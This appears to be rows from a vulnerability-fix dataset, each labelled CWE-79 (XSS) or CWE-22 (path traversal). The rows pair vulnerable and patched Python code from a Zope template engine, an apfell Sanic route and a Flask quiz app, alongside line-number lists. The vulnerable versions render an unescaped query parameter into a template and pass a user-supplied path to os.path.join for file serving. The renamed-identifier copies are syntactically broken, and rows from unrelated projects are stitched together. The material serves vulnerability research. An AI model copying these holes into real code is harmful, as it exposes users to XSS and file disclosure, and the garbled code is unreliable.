if VAR_14 is False:
return VAR_10
if getattr(VAR_10, '__call__', VAR_0) is not VAR_0 or \
isinstance(VAR_10, type):
return VAR_10()
return VAR_10
class CLASS_2(expressions.PathExpr):
VAR_15 = VAR_1
VAR_16 = Static(template(
"cls()", VAR_9=Symbol(CLASS_0), mode="eval"
))
class CLASS_3(CLASS_2):
VAR_16 = Static(template(
"cls()", VAR_9=Symbol(CLASS_1), mode="eval"
))
class CLASS_4(expressions.NocallExpr, CLASS_2):
pass
class CLASS_5(expressions.ExistsExpr):
VAR_15 = VAR_1
class CLASS_6(NodeTransformer):
VAR_17 = {
'_getattr_': guarded_getattr,
'_getitem_': guarded_getitem,
'_apply_': guarded_apply,
'_getiter_': guarded_iter,
'_inplacevar_': protected_inplacevar,
}
def FUNC_6(self, VAR_18):
VAR_28 = self.secured.get(VAR_18.id)
if VAR_28 is not None:
return Symbol(VAR_28)
return VAR_18
class CLASS_7(expressions.PythonExpr):
VAR_19 = RestrictingNodeTransformer()
VAR_20 = CLASS_6()
VAR_21 = expressions.PythonExpr.builtins.copy()
builtins.update({
VAR_30: FUNC_0(builtin) for (VAR_30, builtin) in utility_builtins.items()
})
def FUNC_7(self, VAR_22):
VAR_29 = VAR_22.encode('utf-8')
VAR_18 = FUNC_7(VAR_29, mode='eval')
self.restricted_python_transformer.visit(VAR_18)
self.page_templates_expression_transformer.visit(VAR_18)
return VAR_18
@implementer(IZopeAwareEngine)
class CLASS_8(ExpressionEngine):
def FUNC_8(self, VAR_23):
raise NotImplementedError()
VAR_3 = dict(
python=CLASS_7,
VAR_22=StringExpr,
not_=NotExpr,
exists=CLASS_5,
path=CLASS_2,
provider=expressions.ProviderExpr,
nocall=CLASS_4)
def FUNC_1(VAR_3=types, VAR_4=True, **VAR_5):
VAR_24 = CLASS_8()
def FUNC_9(VAR_25):
return VAR_25[:-1] if VAR_25.endswith("_") else VAR_25
VAR_24.untrusted = VAR_4
VAR_26 = VAR_24.types
for VAR_25, v in VAR_3.items():
VAR_25 = FUNC_9(VAR_25)
VAR_24.registerType(VAR_25, v)
for VAR_25, v in VAR_5.items():
VAR_25 = FUNC_9(VAR_25)
if VAR_25 in VAR_26:
del VAR_26[VAR_25]
VAR_24.registerType(VAR_25, v)
return VAR_24
def FUNC_2(**VAR_5):
VAR_27 = dict(python=expressions.PythonExpr, path=CLASS_3)
VAR_27.update(VAR_5)
return FUNC_1(VAR_4=False, **VAR_27)
VAR_6 = FUNC_1()
def FUNC_3():
return VAR_6
VAR_7 = FUNC_2()
def FUNC_4():
return VAR_7
|
import warnings
from ast import NodeTransformer
from ast import .parse
from chameleon.astutil import Static
from chameleon.astutil import Symbol
from chameleon.codegen import template
from chameleon.tales import NotExpr
from chameleon.tales import StringExpr
from AccessControl.SecurityManagement import getSecurityManager
from AccessControl.ZopeGuards import guarded_apply
from AccessControl.ZopeGuards import guarded_getattr
from AccessControl.ZopeGuards import guarded_getitem
from AccessControl.ZopeGuards import guarded_iter
from AccessControl.ZopeGuards import protected_inplacevar
from OFS.interfaces import ITraversable
from RestrictedPython import RestrictingNodeTransformer
from RestrictedPython.Utilities import utility_builtins
from z3c.pt import .expressions
from zExceptions import NotFound
from zExceptions import Unauthorized
from zope.interface import implementer
from zope.tales.tales import ExpressionEngine
from zope.traversing.adapters import .traversePathElement
from zope.traversing.interfaces import TraversalError
from .Expressions import render
from .interfaces import IZopeAwareEngine
VAR_0 = object()
VAR_1 = (
AttributeError,
LookupError,
NameError,
TypeError,
ValueError,
NotFound,
Unauthorized,
TraversalError,
)
def FUNC_0(VAR_2):
return Static(template("obj", VAR_2=Symbol(VAR_2), mode="eval"))
class CLASS_0:
VAR_8 = 'restrictedTraverse'
__slots__ = ()
@classmethod
def FUNC_5(VAR_9, VAR_10, VAR_11, VAR_12):
VAR_28 = getSecurityManager().validate
VAR_12 = list(VAR_12)
path_items.reverse()
while VAR_12:
VAR_31 = VAR_12.pop()
if ITraversable.providedBy(VAR_10):
base = getattr(VAR_10, VAR_9.traverse_method)(VAR_31)
else:
VAR_32 = traversePathElement(VAR_10, VAR_31, VAR_12,
VAR_11=request)
if VAR_9.traverse_method != 'restrictedTraverse':
VAR_10 = VAR_32
continue
if VAR_31 == '_':
warnings.warn('Traversing to the VAR_31 `_` is deprecated '
'and will be removed in Zope 6.',
DeprecationWarning)
VAR_10 = VAR_32
continue
if VAR_31.startswith('_'):
raise NotFound(VAR_31)
try:
VAR_28(VAR_10, VAR_10, VAR_31, VAR_32)
VAR_10 = VAR_32
except Unauthorized:
raise NotFound(VAR_31)
return VAR_10
def __call__(self, VAR_10, VAR_13, VAR_14, VAR_12):
VAR_11 = VAR_13.get('request')
if VAR_12:
VAR_10 = self.traverse(VAR_10, VAR_11, VAR_12)
if VAR_14 is False:
return VAR_10
if getattr(VAR_10, '__call__', VAR_0) is not VAR_0 or \
callable(VAR_10):
VAR_10 = render(VAR_10, VAR_13)
return VAR_10
class CLASS_1(CLASS_0):
VAR_8 = 'unrestrictedTraverse'
__slots__ = ()
def __call__(self, VAR_10, VAR_13, VAR_14, VAR_12):
VAR_11 = VAR_13.get('request')
VAR_10 = self.traverse(VAR_10, VAR_11, VAR_12)
if VAR_14 is False:
return VAR_10
if getattr(VAR_10, '__call__', VAR_0) is not VAR_0 or \
isinstance(VAR_10, type):
return VAR_10()
return VAR_10
class CLASS_2(expressions.PathExpr):
VAR_15 = VAR_1
VAR_16 = Static(template(
"cls()", VAR_9=Symbol(CLASS_0), mode="eval"
))
class CLASS_3(CLASS_2):
VAR_16 = Static(template(
"cls()", VAR_9=Symbol(CLASS_1), mode="eval"
))
class CLASS_4(expressions.NocallExpr, CLASS_2):
pass
class CLASS_5(expressions.ExistsExpr):
VAR_15 = VAR_1
class CLASS_6(NodeTransformer):
VAR_17 = {
'_getattr_': guarded_getattr,
'_getitem_': guarded_getitem,
'_apply_': guarded_apply,
'_getiter_': guarded_iter,
'_inplacevar_': protected_inplacevar,
}
def FUNC_6(self, VAR_18):
VAR_29 = self.secured.get(VAR_18.id)
if VAR_29 is not None:
return Symbol(VAR_29)
return VAR_18
class CLASS_7(expressions.PythonExpr):
VAR_19 = RestrictingNodeTransformer()
VAR_20 = CLASS_6()
VAR_21 = expressions.PythonExpr.builtins.copy()
builtins.update({
VAR_31: FUNC_0(builtin) for (VAR_31, builtin) in utility_builtins.items()
})
def FUNC_7(self, VAR_22):
VAR_30 = VAR_22.encode('utf-8')
VAR_18 = FUNC_7(VAR_30, mode='eval')
self.restricted_python_transformer.visit(VAR_18)
self.page_templates_expression_transformer.visit(VAR_18)
return VAR_18
@implementer(IZopeAwareEngine)
class CLASS_8(ExpressionEngine):
def FUNC_8(self, VAR_23):
raise NotImplementedError()
VAR_3 = dict(
python=CLASS_7,
VAR_22=StringExpr,
not_=NotExpr,
exists=CLASS_5,
path=CLASS_2,
provider=expressions.ProviderExpr,
nocall=CLASS_4)
def FUNC_1(VAR_3=types, VAR_4=True, **VAR_5):
VAR_24 = CLASS_8()
def FUNC_9(VAR_25):
return VAR_25[:-1] if VAR_25.endswith("_") else VAR_25
VAR_24.untrusted = VAR_4
VAR_26 = VAR_24.types
for VAR_25, v in VAR_3.items():
VAR_25 = FUNC_9(VAR_25)
VAR_24.registerType(VAR_25, v)
for VAR_25, v in VAR_5.items():
VAR_25 = FUNC_9(VAR_25)
if VAR_25 in VAR_26:
del VAR_26[VAR_25]
VAR_24.registerType(VAR_25, v)
return VAR_24
def FUNC_2(**VAR_5):
VAR_27 = dict(python=expressions.PythonExpr, path=CLASS_3)
VAR_27.update(VAR_5)
return FUNC_1(VAR_4=False, **VAR_27)
VAR_6 = FUNC_1()
def FUNC_3():
return VAR_6
VAR_7 = FUNC_2()
def FUNC_4():
return VAR_7
| [
2,
6,
12,
28,
31,
32,
34,
45,
46,
49,
50,
53,
55,
59,
62,
65,
72,
78,
80,
83,
86,
89,
93,
95,
96,
99,
101,
104,
106,
109,
113,
115,
116,
119,
123,
124,
129,
130,
133,
134,
137,
138,
147,
152,
154,
155,
159,
160,
162,
163,
167,
171,
172,
174,
175,
177,
179,
180,
181,
182,
183,
184,
185,
189,
194,
195,
204,
205,
208,
211,
223,
224,
229,
230,
232,
233,
236,
237,
239,
240,
243,
1,
188,
189,
190,
191,
58
] | [
2,
6,
12,
29,
32,
33,
35,
46,
47,
50,
51,
54,
56,
60,
64,
67,
73,
74,
75,
76,
80,
81,
82,
83,
90,
91,
92,
95,
96,
97,
102,
104,
106,
109,
112,
115,
119,
121,
122,
125,
127,
130,
132,
135,
139,
141,
142,
145,
149,
150,
155,
156,
159,
160,
163,
164,
173,
178,
180,
181,
185,
186,
188,
189,
193,
197,
198,
200,
201,
203,
205,
206,
207,
208,
209,
210,
211,
215,
220,
221,
230,
231,
234,
237,
249,
250,
255,
256,
258,
259,
262,
263,
265,
266,
269,
1,
214,
215,
216,
217,
59
] |
1CWE-79
| from app import apfell, links, use_ssl
from sanic import response
from jinja2 import Environment, PackageLoader
from sanic_jwt.decorators import scoped, inject_user
from app.routes.routes import respect_pivot
import urllib.parse
env = Environment(loader=PackageLoader('app', 'templates'))
@apfell.route("/apiui/command_help")
@inject_user()
@scoped(['auth:user', 'auth:apitoken_user'], False) # user or user-level api token are ok
async def apiui_command_help(request, user):
template = env.get_template('apiui_command_help.html')
if len(request.query_args) != 0:
data = urllib.parse.unquote(request.query_args[0][1])
print(data)
else:
data = ""
if use_ssl:
content = template.render(links=await respect_pivot(links, request), name=user['username'], http="https",
ws="wss", config=user['ui_config'], view_utc_time=user['view_utc_time'], agent=data)
else:
content = template.render(links=await respect_pivot(links, request), name=user['username'], http="http",
ws="ws", config=user['ui_config'], view_utc_time=user['view_utc_time'], agent=data)
return response.html(content)
# add links to the routes in this file at the bottom
links['apiui_command_help'] = apfell.url_for('apiui_command_help')
| from app import apfell, links, use_ssl, db_objects
from sanic import response
from jinja2 import Environment, PackageLoader
from sanic_jwt.decorators import scoped, inject_user
from app.routes.routes import respect_pivot
import urllib.parse
import app.database_models.model as db_model
env = Environment(loader=PackageLoader('app', 'templates'))
@apfell.route("/apiui/command_help")
@inject_user()
@scoped(['auth:user', 'auth:apitoken_user'], False) # user or user-level api token are ok
async def apiui_command_help(request, user):
template = env.get_template('apiui_command_help.html')
if len(request.query_args) != 0:
data = urllib.parse.unquote(request.query_args[0][1])
query = await db_model.payloadtype_query()
try:
payloadtype = await db_objects.get(query, ptype=data)
except Exception as e:
data = ""
else:
data = ""
if use_ssl:
content = template.render(links=await respect_pivot(links, request), name=user['username'], http="https",
ws="wss", config=user['ui_config'], view_utc_time=user['view_utc_time'], agent=data)
else:
content = template.render(links=await respect_pivot(links, request), name=user['username'], http="http",
ws="ws", config=user['ui_config'], view_utc_time=user['view_utc_time'], agent=data)
return response.html(content)
# add links to the routes in this file at the bottom
links['apiui_command_help'] = apfell.url_for('apiui_command_help')
| xss | {
"code": [
"from app import apfell, links, use_ssl",
" print(data)"
],
"line_no": [
1,
18
]
} | {
"code": [
"from app import apfell, links, use_ssl, db_objects",
" query = await db_model.payloadtype_query()",
" try:",
" payloadtype = await db_objects.get(query, ptype=data)",
" except Exception as e:",
" data = \"\""
],
"line_no": [
1,
19,
20,
21,
22,
23
]
} | from app import apfell, VAR_3, use_ssl
from sanic import response
from jinja2 import Environment, PackageLoader
from sanic_jwt.decorators import scoped, inject_user
from app.routes.routes import respect_pivot
import urllib.parse
VAR_0 = Environment(loader=PackageLoader('app', 'templates'))
@apfell.route("/apiui/command_help")
@inject_user()
@scoped(['auth:user', 'auth:apitoken_user'], False) # VAR_2 or VAR_2-level api token are ok
async def FUNC_0(VAR_1, VAR_2):
VAR_4 = VAR_0.get_template('apiui_command_help.html')
if len(VAR_1.query_args) != 0:
VAR_5 = urllib.parse.unquote(VAR_1.query_args[0][1])
print(VAR_5)
else:
VAR_5 = ""
if use_ssl:
VAR_6 = VAR_4.render(VAR_3=await respect_pivot(VAR_3, VAR_1), name=VAR_2['username'], http="https",
ws="wss", config=VAR_2['ui_config'], view_utc_time=VAR_2['view_utc_time'], agent=VAR_5)
else:
VAR_6 = VAR_4.render(VAR_3=await respect_pivot(VAR_3, VAR_1), name=VAR_2['username'], http="http",
ws="ws", config=VAR_2['ui_config'], view_utc_time=VAR_2['view_utc_time'], agent=VAR_5)
return response.html(VAR_6)
VAR_3['apiui_command_help'] = apfell.url_for('apiui_command_help')
| from app import apfell, VAR_3, use_ssl, db_objects
from sanic import response
from jinja2 import Environment, PackageLoader
from sanic_jwt.decorators import scoped, inject_user
from app.routes.routes import respect_pivot
import urllib.parse
import app.database_models.model as db_model
VAR_0 = Environment(loader=PackageLoader('app', 'templates'))
@apfell.route("/apiui/command_help")
@inject_user()
@scoped(['auth:user', 'auth:apitoken_user'], False) # VAR_2 or VAR_2-level api token are ok
async def FUNC_0(VAR_1, VAR_2):
VAR_4 = VAR_0.get_template('apiui_command_help.html')
if len(VAR_1.query_args) != 0:
VAR_5 = urllib.parse.unquote(VAR_1.query_args[0][1])
VAR_6 = await db_model.payloadtype_query()
try:
VAR_8 = await db_objects.get(VAR_6, ptype=VAR_5)
except Exception as e:
VAR_5 = ""
else:
VAR_5 = ""
if use_ssl:
VAR_7 = VAR_4.render(VAR_3=await respect_pivot(VAR_3, VAR_1), name=VAR_2['username'], http="https",
ws="wss", config=VAR_2['ui_config'], view_utc_time=VAR_2['view_utc_time'], agent=VAR_5)
else:
VAR_7 = VAR_4.render(VAR_3=await respect_pivot(VAR_3, VAR_1), name=VAR_2['username'], http="http",
ws="ws", config=VAR_2['ui_config'], view_utc_time=VAR_2['view_utc_time'], agent=VAR_5)
return response.html(VAR_7)
VAR_3['apiui_command_help'] = apfell.url_for('apiui_command_help')
| [
7,
9,
10,
28,
29,
31
] | [
8,
10,
11,
33,
34,
36
] |
0CWE-22
| import configparser
from flask import Flask, render_template, session, request, flash, redirect, url_for, Response, abort, jsonify, send_file
import socket
import os
import random
import copy
from flask_sqlalchemy import SQLAlchemy, Model
import gspread
from oauth2client.service_account import ServiceAccountCredentials
import json
import base64
from collections import namedtuple
from app.common.decorator import return_500_if_errors
scope = ['https://spreadsheets.google.com/feeds',
'https://www.googleapis.com/auth/drive']
hostname = socket.gethostname()
isLocal = None
munhak_rows_data = None
if hostname[:7] == "DESKTOP":
isLocal = True
else:
isLocal = False
app = Flask(__name__)
def update():
gc = gspread.authorize(credentials).open("문학따먹기")
wks = gc.get_worksheet(0)
rows = wks.get_all_values()
print(rows)
try:
data = []
for row in rows[1:]:
row_tuple = namedtuple("Munhak", rows[0])(*row)
row_tuple = row_tuple._replace(keywords=json.loads(row_tuple.keywords))
if row_tuple.is_available == "TRUE":
data.append(row_tuple)
except:
pass
global munhak_rows_data
munhak_rows_data = data
print(data)
# print(munhak_rows)
return
if isLocal:
config = configparser.ConfigParser()
config.read('config.ini')
pg_db_username = config['DEFAULT']['LOCAL_DB_USERNAME']
pg_db_password = config['DEFAULT']['LOCAL_DB_PASSWORD']
pg_db_name = config['DEFAULT']['LOCAL_DB_NAME']
pg_db_hostname = config['DEFAULT']['LOCAL_DB_HOSTNAME']
app.config["SQLALCHEMY_DATABASE_URI"] = "postgresql://{DB_USER}:{DB_PASS}@{DB_ADDR}/{DB_NAME}".format(
DB_USER=pg_db_username,
DB_PASS=pg_db_password,
DB_ADDR=pg_db_hostname,
DB_NAME=pg_db_name)
app.config["SECRET_KEY"] = config['DEFAULT']['SECRET_KEY']
credentials = ServiceAccountCredentials.from_json_keyfile_name(config['DEFAULT']['GOOGLE_CREDENTIALS_PATH'], scope)
else:
app.config["SQLALCHEMY_DATABASE_URI"] = os.environ.get('DATABASE_URL', None)
app.config["SECRET_KEY"] = os.environ.get('SECRET_KEY', None)
print(os.environ.get('GOOGLE_CREDENTIALS', None))
print(json.loads(os.environ.get('GOOGLE_CREDENTIALS', None)))
credentials = ServiceAccountCredentials.from_json_keyfile_dict(json.loads(os.environ.get('GOOGLE_CREDENTIALS', None)), scope)
update()
@app.route('/')
def index():
munhak_rows = copy.deepcopy(munhak_rows_data)
data = {
"total_munhak" : len(munhak_rows),
"source_list" : sorted(set([munhak_row.source for munhak_row in munhak_rows]))
}
print(data)
session["quiz_count"] = 0
return render_template("quiz/index.html", data=data)
@app.route("/get-quiz")
def get_quiz():
if "quiz_count" not in session:
session["quiz_count"] = 0
session["total_munhak"] = len(munhak_rows_data)
if "solved_quiz" not in session:
session["solved_quiz"] = []
session["result"] = None
quiz_no = session["quiz_count"] + 1
solved_quiz = session["solved_quiz"]
if "current_munhak" not in session or session["current_munhak"] is None:
# munhak_rows = Munhak.query.filter_by(is_available=True).all()
munhak_rows = copy.deepcopy(munhak_rows_data)
not_solved_munhak_rows = [munhak_row for munhak_row in munhak_rows if munhak_row.munhak_seq not in solved_quiz]
if len(not_solved_munhak_rows) == 0:
session["result"] = True
return redirect(url_for("result"))
correct_munhak_row = random.choice(not_solved_munhak_rows)
for _ in [munhak_row for munhak_row in munhak_rows if munhak_row.title == correct_munhak_row.title]:
munhak_rows.remove(_)
random.shuffle(munhak_rows)
option_munhak_rows = munhak_rows[0:3] + [correct_munhak_row]
random.shuffle(option_munhak_rows)
correct = option_munhak_rows.index(correct_munhak_row)
print(correct)
# correct = random.randrange(0, 4)
#
# answer_row = not_solved_munhak_rows[correct]
#
session["correct"] = correct
hint = random.choice(correct_munhak_row.keywords)
hint = hint.replace("\\", "")
session["current_munhak"] = {
"munhak_seq": correct_munhak_row.munhak_seq,
"source": correct_munhak_row.source,
"category": correct_munhak_row.category,
"hint": hint,
"title": correct_munhak_row.title,
"writer": correct_munhak_row.writer
}
session["options"] = [munhak_row._asdict() for munhak_row in option_munhak_rows]
data = {
"quiz_no": quiz_no,
"type": "객관식",
"category": correct_munhak_row.category,
"hint": hint,
"options": [
f"{munhak_row.writer}, 『{munhak_row.title}』" for munhak_row in option_munhak_rows
],
"total_munhak": len(munhak_rows_data)
}
print(data)
#
return render_template("quiz/quiz.html", data=data)
else:
# print(hint)
data = {
"quiz_no": quiz_no,
"type": "객관식",
"category": session["current_munhak"]["category"],
"hint": session["current_munhak"]["hint"],
"options": [
f"{munhak_row['writer']}, 『{munhak_row['title']}』" for munhak_row in session["options"]
],
"total_munhak": len(munhak_rows_data)
}
print(data)
#
return render_template("quiz/quiz.html", data=data)
@app.route('/quiz')
def quiz():
return render_template("quiz/quiz_container.html")
@app.route("/answer", methods=["GET", "POST"])
def answer():
print(session)
option = request.form.get("option", None)
if option is None or (not type(option) != int):
return abort(400)
option = int(option)
correct = session["correct"]
if correct is None:
return abort(401)
current_munhak = session["current_munhak"]
if current_munhak is None:
return abort(401)
if correct == option:
session["quiz_count"] += 1
session["solved_quiz"].append(current_munhak["munhak_seq"])
session["current_munhak"] = None
# current_munhak = jsonify(current_munhak)
return "success"
else:
if "quiz_count" not in session:
session["quiz_count"] = 0
if "solved_quiz" not in session:
# session["solved_quiz"] = []
session["result"] = False
return "failed", 404
@app.route("/result", methods=["GET", "POST"])
def result():
is_success = session["result"]
data = {
"is_success" : is_success,
"solved_count" : session["quiz_count"],
"correct" : session["correct"],
"current_munhak" : session["current_munhak"]
}
session["quiz_count"] = 0
session["solved_quiz"] = []
session["current_munhak"] = None
print(data)
return render_template("quiz/result.html", data = data)
@app.route('/update')
def update_():
if request.args.get("key", None) != app.config["SECRET_KEY"]:
return "error"
update()
session.clear()
return f"success! {len(munhak_rows_data)}"
@app.route('/images/<path:path>')
def get_image(path):
def get_absolute_path(path):
import os
script_dir = os.path.dirname(__file__) # <-- absolute dir the script is in
rel_path = path
abs_file_path = os.path.join(script_dir, rel_path)
return abs_file_path
return send_file(
get_absolute_path(f"./images/{path}"),
mimetype='image/png',
attachment_filename='snapshot.png',
cache_timeout=0
)
if __name__ == '__main__':
app.run()
| import configparser
from flask import Flask, render_template, session, request, flash, redirect, url_for, Response, abort, jsonify, send_file
from werkzeug.utils import safe_join
import socket
import os
import random
import copy
from flask_sqlalchemy import SQLAlchemy, Model
import gspread
from oauth2client.service_account import ServiceAccountCredentials
import json
import base64
from collections import namedtuple
from app.common.decorator import return_500_if_errors
scope = ['https://spreadsheets.google.com/feeds',
'https://www.googleapis.com/auth/drive']
hostname = socket.gethostname()
isLocal = None
munhak_rows_data = None
if hostname[:7] == "DESKTOP":
isLocal = True
else:
isLocal = False
app = Flask(__name__)
def update():
gc = gspread.authorize(credentials).open("문학따먹기")
wks = gc.get_worksheet(0)
rows = wks.get_all_values()
print(rows)
try:
data = []
for row in rows[1:]:
row_tuple = namedtuple("Munhak", rows[0])(*row)
row_tuple = row_tuple._replace(keywords=json.loads(row_tuple.keywords))
if row_tuple.is_available == "TRUE":
data.append(row_tuple)
except:
pass
global munhak_rows_data
munhak_rows_data = data
print(data)
# print(munhak_rows)
return
if isLocal:
config = configparser.ConfigParser()
config.read('config.ini')
pg_db_username = config['DEFAULT']['LOCAL_DB_USERNAME']
pg_db_password = config['DEFAULT']['LOCAL_DB_PASSWORD']
pg_db_name = config['DEFAULT']['LOCAL_DB_NAME']
pg_db_hostname = config['DEFAULT']['LOCAL_DB_HOSTNAME']
app.config["SQLALCHEMY_DATABASE_URI"] = "postgresql://{DB_USER}:{DB_PASS}@{DB_ADDR}/{DB_NAME}".format(
DB_USER=pg_db_username,
DB_PASS=pg_db_password,
DB_ADDR=pg_db_hostname,
DB_NAME=pg_db_name)
app.config["SECRET_KEY"] = config['DEFAULT']['SECRET_KEY']
credentials = ServiceAccountCredentials.from_json_keyfile_name(config['DEFAULT']['GOOGLE_CREDENTIALS_PATH'], scope)
else:
app.config["SQLALCHEMY_DATABASE_URI"] = os.environ.get('DATABASE_URL', None)
app.config["SECRET_KEY"] = os.environ.get('SECRET_KEY', None)
print(os.environ.get('GOOGLE_CREDENTIALS', None))
print(json.loads(os.environ.get('GOOGLE_CREDENTIALS', None)))
credentials = ServiceAccountCredentials.from_json_keyfile_dict(json.loads(os.environ.get('GOOGLE_CREDENTIALS', None)), scope)
update()
@app.route('/')
def index():
munhak_rows = copy.deepcopy(munhak_rows_data)
data = {
"total_munhak" : len(munhak_rows),
"source_list" : sorted(set([munhak_row.source for munhak_row in munhak_rows]))
}
print(data)
session["quiz_count"] = 0
return render_template("quiz/index.html", data=data)
@app.route("/get-quiz")
def get_quiz():
if "quiz_count" not in session:
session["quiz_count"] = 0
session["total_munhak"] = len(munhak_rows_data)
if "solved_quiz" not in session:
session["solved_quiz"] = []
session["result"] = None
quiz_no = session["quiz_count"] + 1
solved_quiz = session["solved_quiz"]
if "current_munhak" not in session or session["current_munhak"] is None:
# munhak_rows = Munhak.query.filter_by(is_available=True).all()
munhak_rows = copy.deepcopy(munhak_rows_data)
not_solved_munhak_rows = [munhak_row for munhak_row in munhak_rows if munhak_row.munhak_seq not in solved_quiz]
if len(not_solved_munhak_rows) == 0:
session["result"] = True
return redirect(url_for("result"))
correct_munhak_row = random.choice(not_solved_munhak_rows)
for _ in [munhak_row for munhak_row in munhak_rows if munhak_row.title == correct_munhak_row.title]:
munhak_rows.remove(_)
random.shuffle(munhak_rows)
option_munhak_rows = munhak_rows[0:3] + [correct_munhak_row]
random.shuffle(option_munhak_rows)
correct = option_munhak_rows.index(correct_munhak_row)
print(correct)
# correct = random.randrange(0, 4)
#
# answer_row = not_solved_munhak_rows[correct]
#
session["correct"] = correct
hint = random.choice(correct_munhak_row.keywords)
hint = hint.replace("\\", "")
session["current_munhak"] = {
"munhak_seq": correct_munhak_row.munhak_seq,
"source": correct_munhak_row.source,
"category": correct_munhak_row.category,
"hint": hint,
"title": correct_munhak_row.title,
"writer": correct_munhak_row.writer
}
session["options"] = [munhak_row._asdict() for munhak_row in option_munhak_rows]
data = {
"quiz_no": quiz_no,
"type": "객관식",
"category": correct_munhak_row.category,
"hint": hint,
"options": [
f"{munhak_row.writer}, 『{munhak_row.title}』" for munhak_row in option_munhak_rows
],
"total_munhak": len(munhak_rows_data)
}
print(data)
#
return render_template("quiz/quiz.html", data=data)
else:
# print(hint)
data = {
"quiz_no": quiz_no,
"type": "객관식",
"category": session["current_munhak"]["category"],
"hint": session["current_munhak"]["hint"],
"options": [
f"{munhak_row['writer']}, 『{munhak_row['title']}』" for munhak_row in session["options"]
],
"total_munhak": len(munhak_rows_data)
}
print(data)
#
return render_template("quiz/quiz.html", data=data)
@app.route('/quiz')
def quiz():
return render_template("quiz/quiz_container.html")
@app.route("/answer", methods=["GET", "POST"])
def answer():
print(session)
option = request.form.get("option", None)
if option is None or (not type(option) != int):
return abort(400)
option = int(option)
correct = session["correct"]
if correct is None:
return abort(401)
current_munhak = session["current_munhak"]
if current_munhak is None:
return abort(401)
if correct == option:
session["quiz_count"] += 1
session["solved_quiz"].append(current_munhak["munhak_seq"])
session["current_munhak"] = None
# current_munhak = jsonify(current_munhak)
return "success"
else:
if "quiz_count" not in session:
session["quiz_count"] = 0
if "solved_quiz" not in session:
# session["solved_quiz"] = []
session["result"] = False
return "failed", 404
@app.route("/result", methods=["GET", "POST"])
def result():
is_success = session["result"]
data = {
"is_success" : is_success,
"solved_count" : session["quiz_count"],
"correct" : session["correct"],
"current_munhak" : session["current_munhak"]
}
session["quiz_count"] = 0
session["solved_quiz"] = []
session["current_munhak"] = None
print(data)
return render_template("quiz/result.html", data = data)
@app.route('/update')
def update_():
if request.args.get("key", None) != app.config["SECRET_KEY"]:
return "error"
update()
session.clear()
return f"success! {len(munhak_rows_data)}"
@app.route('/images/<path:path>')
def get_image(path):
def get_absolute_path(path):
import os
script_dir = os.path.dirname(__file__) # <-- absolute dir the script is in
rel_path = path
abs_file_path = safe_join(script_dir, rel_path)
return abs_file_path
return send_file(
get_absolute_path(f"./images/{path}"),
mimetype='image/png',
attachment_filename='snapshot.png',
cache_timeout=0
)
if __name__ == '__main__':
app.run()
| path_disclosure | {
"code": [
" abs_file_path = os.path.join(script_dir, rel_path)"
],
"line_no": [
270
]
} | {
"code": [
"from werkzeug.utils import safe_join",
" abs_file_path = safe_join(script_dir, rel_path)"
],
"line_no": [
4,
271
]
} | import .configparser
from flask import Flask, render_template, VAR_17, request, flash, redirect, url_for, Response, abort, jsonify, send_file
import socket
import os
import random
import copy
from flask_sqlalchemy import SQLAlchemy, Model
import gspread
from oauth2client.service_account import ServiceAccountCredentials
import json
import base64
from collections import namedtuple
from VAR_4.common.decorator import return_500_if_errors
VAR_0 = ['https://spreadsheets.google.com/feeds',
'https://www.googleapis.com/auth/drive']
VAR_1 = socket.gethostname()
VAR_2 = None
VAR_3 = None
if VAR_1[:7] == "DESKTOP":
VAR_2 = True
else:
VAR_2 = False
VAR_4 = Flask(__name__)
def FUNC_0():
VAR_6 = gspread.authorize(VAR_14).open("문학따먹기")
VAR_7 = VAR_6.get_worksheet(0)
VAR_8 = VAR_7.get_all_values()
print(VAR_8)
try:
VAR_16 = []
for row in VAR_8[1:]:
VAR_31 = namedtuple("Munhak", VAR_8[0])(*row)
VAR_31 = VAR_31._replace(keywords=json.loads(VAR_31.keywords))
if VAR_31.is_available == "TRUE":
VAR_16.append(VAR_31)
except:
pass
global VAR_3
munhak_rows_data = VAR_16
print(VAR_16)
return
if VAR_2:
VAR_9 = configparser.ConfigParser()
VAR_9.read('config.ini')
VAR_10 = VAR_9['DEFAULT']['LOCAL_DB_USERNAME']
VAR_11 = VAR_9['DEFAULT']['LOCAL_DB_PASSWORD']
VAR_12 = VAR_9['DEFAULT']['LOCAL_DB_NAME']
VAR_13 = VAR_9['DEFAULT']['LOCAL_DB_HOSTNAME']
VAR_4.config["SQLALCHEMY_DATABASE_URI"] = "postgresql://{DB_USER}:{DB_PASS}@{DB_ADDR}/{DB_NAME}".format(
DB_USER=VAR_10,
DB_PASS=VAR_11,
DB_ADDR=VAR_13,
DB_NAME=VAR_12)
VAR_4.config["SECRET_KEY"] = VAR_9['DEFAULT']['SECRET_KEY']
VAR_14 = ServiceAccountCredentials.from_json_keyfile_name(VAR_9['DEFAULT']['GOOGLE_CREDENTIALS_PATH'], VAR_0)
else:
VAR_4.config["SQLALCHEMY_DATABASE_URI"] = os.environ.get('DATABASE_URL', None)
VAR_4.config["SECRET_KEY"] = os.environ.get('SECRET_KEY', None)
print(os.environ.get('GOOGLE_CREDENTIALS', None))
print(json.loads(os.environ.get('GOOGLE_CREDENTIALS', None)))
VAR_14 = ServiceAccountCredentials.from_json_keyfile_dict(json.loads(os.environ.get('GOOGLE_CREDENTIALS', None)), VAR_0)
FUNC_0()
@VAR_4.route('/')
def FUNC_1():
VAR_15 = copy.deepcopy(VAR_3)
VAR_16 = {
"total_munhak" : len(VAR_15),
"source_list" : sorted(set([munhak_row.source for munhak_row in VAR_15]))
}
print(VAR_16)
VAR_17["quiz_count"] = 0
return render_template("quiz/FUNC_1.html", VAR_16=data)
@VAR_4.route("/get-quiz")
def FUNC_2():
if "quiz_count" not in VAR_17:
VAR_17["quiz_count"] = 0
VAR_17["total_munhak"] = len(VAR_3)
if "solved_quiz" not in VAR_17:
VAR_17["solved_quiz"] = []
VAR_17["result"] = None
VAR_18 = VAR_17["quiz_count"] + 1
VAR_19 = VAR_17["solved_quiz"]
if "current_munhak" not in VAR_17 or VAR_17["current_munhak"] is None:
VAR_15 = copy.deepcopy(VAR_3)
VAR_24 = [munhak_row for munhak_row in VAR_15 if munhak_row.munhak_seq not in VAR_19]
if len(VAR_24) == 0:
VAR_17["result"] = True
return redirect(url_for("result"))
VAR_25 = random.choice(VAR_24)
for _ in [munhak_row for munhak_row in VAR_15 if munhak_row.title == VAR_25.title]:
VAR_15.remove(_)
random.shuffle(VAR_15)
VAR_26 = VAR_15[0:3] + [VAR_25]
random.shuffle(VAR_26)
VAR_21 = VAR_26.index(VAR_25)
print(VAR_21)
